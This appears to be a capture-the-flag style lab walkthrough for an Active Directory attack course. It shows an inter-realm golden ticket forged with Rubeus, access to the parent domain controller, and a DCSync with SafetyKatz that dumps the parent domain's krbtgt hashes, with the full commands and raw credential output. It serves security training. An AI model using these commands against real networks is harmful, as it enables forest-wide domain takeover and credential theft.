19 - LO1️9️

Learning Object 19

Tasks

1 - Using DA access to dollarcorp.moneycorp.local, escalate privileges to Enterprise Admin or DA to the parent domain, moneycorp.local using dollarcorp's krbtgt hash

Flag 30 [mcorp-dc] - NTLM hash of krbtgt of moneycorp.local 🚩

Solutions

1 - Using DA access to dollarcorp.moneycorp.local, escalate privileges to Enterprise Admin or DA to the parent domain, moneycorp.local using dollarcorp's krbtgt hash

We already have the krbtgt hash from dcorp-dc. Let's create the inter-realm TGT and inject. Run the below command:

C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args evasive-golden /user:Administrator /id:500 /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /sids:S-1-5-21-335606122-960912869-3279953914-519 /aes256:154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848 /netbios:dcorp /ptt

We can now access mcorp-dc!

winrs -r:mcorp-dc.moneycorp.local cmd
set username
set computername

We can also execute the DCSync attacks against moneycorp. Use the following command in the above prompt where we injected the ticket:

C:\AD\Tools\Loader.exe -path C:\AD\Tools\SafetyKatz.exe -args "lsadump::evasive-dcsync /user:mcorp\krbtgt /domain:moneycorp.local" "exit"

mimikatz(commandline) # lsadump::evasive-dcsync /user:mcorp\krbtgt /domain:moneycorp.local
[DC] 'moneycorp.local' will be the domain
[DC] 'mcorp-dc.moneycorp.local' will be the DC server
[DC] 'mcorp\krbtgt' will be the user account
[rpc] Service  : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)

Object RDN           : krbtgt

** SAM ACCOUNT **

SAM Username         : krbtgt
Account Type         : 30000000 ( USER_OBJECT )
User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )
Account expiration   :
Password last change : 11/11/2022 10:46:24 PM
Object Security ID   : S-1-5-21-335606122-960912869-3279953914-502
Object Relative ID   : 502

Credentials:
  Hash NTLM: a0981492d5dfab1ae0b97b51ea895ddf
    ntlm- 0: a0981492d5dfab1ae0b97b51ea895ddf
    lm  - 0: 87836055143ad5a507de2aaeb9000361

Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
    Random Value : 7c7a5135513110d108390ee6c322423f

* Primary:Kerberos-Newer-Keys *
    Default Salt : MONEYCORP.LOCALkrbtgt
    Default Iterations : 4096
    Credentials
      aes256_hmac       (4096) : 90ec02cc0396de7e08c7d5a163c21fd59fcb9f8163254f9775fc2604b9aedb5e
      aes128_hmac       (4096) : 801bb69b81ef9283f280b97383288442
      des_cbc_md5       (4096) : c20dc80d51f7abd9

* Primary:Kerberos *
    Default Salt : MONEYCORP.LOCALkrbtgt
    Credentials
      des_cbc_md5       : c20dc80d51f7abd9

* Packages *
    NTLM-Strong-NTOWF

* Primary:WDigest *
    01  49fec950691bbeba1b0d33d5a48d0293
    02  0b0c4dbc527ee3154877e070d043cd0d
    03  987346e7f810d2b616da385b0c2549ec
    04  49fec950691bbeba1b0d33d5a48d0293
    05  0b0c4dbc527ee3154877e070d043cd0d
    06  333eda93ecfba8d60c57be7f59b14c62
    07  49fec950691bbeba1b0d33d5a48d0293
    08  cdf2b153a374773dc94ee74d14610428
    09  cdf2b153a374773dc94ee74d14610428
    10  a6687f8a2a0a6dfd7c054d63c0568e61
    11  3cf736e35d2a54f1b0c3345005d3f962
    12  cdf2b153a374773dc94ee74d14610428
    13  50f935f7e1b88f89fba60ed23c8d115c
    14  3cf736e35d2a54f1b0c3345005d3f962
    15  06c616b2109569ddd69c8fc00c6a413c
    16  06c616b2109569ddd69c8fc00c6a413c
    17  179b9c2fd5a34cbb6013df534bf05726
    18  5f217f838649436f34bbf13ccb127f44
    19  3564c9de46ad690b83268cde43c21854
    20  1caa9da91c85a1e176fb85cdefc57587
    21  27b7de3c5a16e7629659152656022831
    22  27b7de3c5a16e7629659152656022831
    23  65f5f95db76e43bd6c4ad216b7577604
    24  026c59a45699b631621233cb38733174
    25  026c59a45699b631621233cb38733174
    26  342a52ec1d3b39d90af55460bcda72e8
    27  ef1e1a688748f79d16e8e32318f51465
    28  9e93ee8e0bcccb1451face3dba22cc69
    29  480da975c1dfc76717a63edc6bb29d7b


mimikatz(commandline) # exit
Bye!

Flag 30 [mcorp-dc] - NTLM hash of krbtgt of moneycorp.local 🚩

krbtgt NTLM has is:

Hash NTLM: a0981492d5dfab1aeXXXXXXXXXXXXXXX